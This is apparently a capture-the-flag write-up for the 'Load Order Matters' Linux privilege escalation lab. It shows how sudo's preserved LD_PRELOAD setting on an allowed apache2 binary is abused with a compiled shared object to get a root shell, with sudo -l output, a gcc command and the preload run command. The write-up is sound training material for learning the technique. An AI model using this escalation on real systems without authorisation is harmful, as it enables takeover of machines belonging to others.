This is the first write up I could find online for Linux Priv Esc, Load Order Matters, if that’s true and my Google skills don’t suck, sweet! 🙂 Load Order Matters is a privilege escalation challenge in the AttackDefence.com intermediate category.

So, what’s the deal?

Challenge Info

So you’ve got a foothold on a regular user account on a Linux box? You’ve tried to escalate privileges to root but nothing seems to work?  Remember the order in which programs, scripts and libraries load dictates what executes! 

Your mission is to get a root shell on the box! 

Mission Accepted

So, I know I am looking to exploit something via load order injection, so I go about trying to find what binary. sudo -l for the quick win…

student@attackdefense:/tmp$ sudo -l
Matching Defaults entries for student on attackdefense:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, env_keep+=LD_PRELOAD

User student may run the following commands on attackdefense:
    (root) NOPASSWD: /usr/sbin/apache2

Let’s try it…

student@attackdefense:/tmp$ sudo /usr/sbin/apache2
[Mon Mar 25 21:31:48.463122 2019] [core:warn] [pid 186] AH00111: Config variable ${APACHE_RUN_DIR} is not defined
apache2: Syntax error on line 80 of /etc/apache2/apache2.conf: DefaultRuntimeDir must be a valid directory, absolute or relative to ServerRoot

We get an error, it expects some ENV variables, let’s check our sudo -l again.

env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, env_keep+=LD_PRELOAD

All the info we need is here, can’t inject our own env variables directly because of env_reset, we cannot reset path either but we do see this, env_keep+=LD_PRELOAD. Awesome!

What is LD_PRELOAD?

Normally the Linux dynamic loader ld-linux (see ld-linux(8) man page) finds and loads the shared libraries needed by a program, prepare the program to run, and then run it. The shared libraries (shared objects) are loaded in whatever order the loader needs them in order to resolve symbols.

LD_PRELOAD is an optional environmental variable containing one or more paths to shared libraries, or shared objects, that the loader will load before any other shared library including the C runtime library (libc.so) This is called preloading a library.

Preloading a library means that its functions will be used before others of the same name in later libraries. This enables library functions to be intercepted and replaced (overwritten.) As a result program behavior can be non-invasively modified, i.e. a recompile is not necessary.

The Escalation

If you read the above, not only should you get LD_PRELOAD but you should also be jumping up and down about what we are about to do next.

First, create shared object file..

student@attackdefense:/tmp$ vi ld-preload.c

Compile payload on target, in /tmp…

student@attackdefense:/tmp$  gcc -fPIC -shared -o /tmp/root.so ld-preload.c -nostartfiles

You will get some warnings, ignore them 🙂

Now, run to win…

student@attackdefense:/tmp$ LD_PRELOAD=/tmp/root.so apache2